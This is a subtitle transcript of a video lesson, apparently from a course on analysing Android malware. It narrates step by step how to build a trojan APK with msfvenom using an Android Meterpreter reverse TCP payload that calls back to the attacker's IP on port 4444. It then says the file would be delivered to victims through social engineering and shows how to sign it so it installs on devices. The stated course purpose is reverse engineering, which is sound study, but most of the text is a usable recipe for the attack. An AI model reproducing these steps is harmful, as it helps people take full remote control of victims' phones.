1
00:00:00,360 --> 00:00:06,720
In this video, we will learn how to create a malicious Android application that, once the user or the

2
00:00:06,720 --> 00:00:07,890
victim invokes it,

3
00:00:08,310 --> 00:00:14,100
connects back to our Kali machine using reverse TCP. Once it connects,

4
00:00:14,400 --> 00:00:18,420
we will have full remote access and control to that device.

5
00:00:19,200 --> 00:00:28,080
So open your terminal and drive, can you, to start the PostgreSQL service and then write

6
00:00:28,080 --> 00:00:32,430
msfconsole to start the Metasploit framework.

7
00:00:32,970 --> 00:00:38,640
Now open your browser and go to any website that will show you your current public IP.

8
00:00:39,600 --> 00:00:40,650
Or just copy that.

9
00:00:42,690 --> 00:00:44,460
Now the framework is starting.

10
00:00:45,420 --> 00:00:48,120
And here is the new command line.

11
00:00:48,750 --> 00:01:00,810
So without going into the details of how the you just need to type msfvenom or venom dash p for

12
00:01:00,810 --> 00:01:02,820
payload and the payload will be Android.

13
00:01:06,970 --> 00:01:08,110
Then forward slash.

14
00:01:09,910 --> 00:01:19,110
Meterpreter, then forward slash reverse underscore TCP, you do press space button, local host.

15
00:01:20,320 --> 00:01:31,120
I'll just paste the IP address, then local port that will listen to the incoming connection from the

16
00:01:31,420 --> 00:01:33,100
compromised mobile phone.

17
00:01:33,160 --> 00:01:34,600
Let's say four four four four.

18
00:01:35,140 --> 00:01:38,860
Now I will export that to the desktop.

19
00:01:39,760 --> 00:01:41,530
I'll provide the path home.

20
00:01:42,550 --> 00:01:44,680
My user desktop.

21
00:01:44,710 --> 00:01:49,530
Then I'll call it like Trojan dot APK.

22
00:01:50,470 --> 00:01:51,070
And that's it.

23
00:01:51,650 --> 00:01:59,680
Now I have created a malicious application that I need to send to the end user using various social

24
00:01:59,680 --> 00:02:00,850
engineering techniques.

25
00:02:01,540 --> 00:02:07,000
And once the end user invokes that, I need to prepare the other half of the attack.

26
00:02:07,040 --> 00:02:11,320
I need to set up a listener on this machine to accept incoming connections.

27
00:02:11,620 --> 00:02:18,700
But for the sake of this course, we'll just use this Trojan dot APK to reverse engineer it and see how

28
00:02:18,700 --> 00:02:25,630
the malware is created or how the malicious code is being populated by the Metasploit framework.

29
00:02:26,290 --> 00:02:32,680
I will upload the Trojan dot APK file to my GitHub repository so you can download it and apply what you

30
00:02:32,680 --> 00:02:35,110
will learn in this course on this file.

31
00:02:36,160 --> 00:02:44,440
It is important to sign the APK file before being able to install it on Android devices. For this purpose,

32
00:02:44,560 --> 00:02:51,920
open the terminal and issue the command d2j dash apk dash

33
00:02:52,060 --> 00:02:57,520
sign and then put the name of the file and just press enter.

34
00:02:59,080 --> 00:03:05,610
You'll notice here that another APK file has been created with dash sign dot apk.

35
00:03:05,950 --> 00:03:08,450
You can rename the file before using it.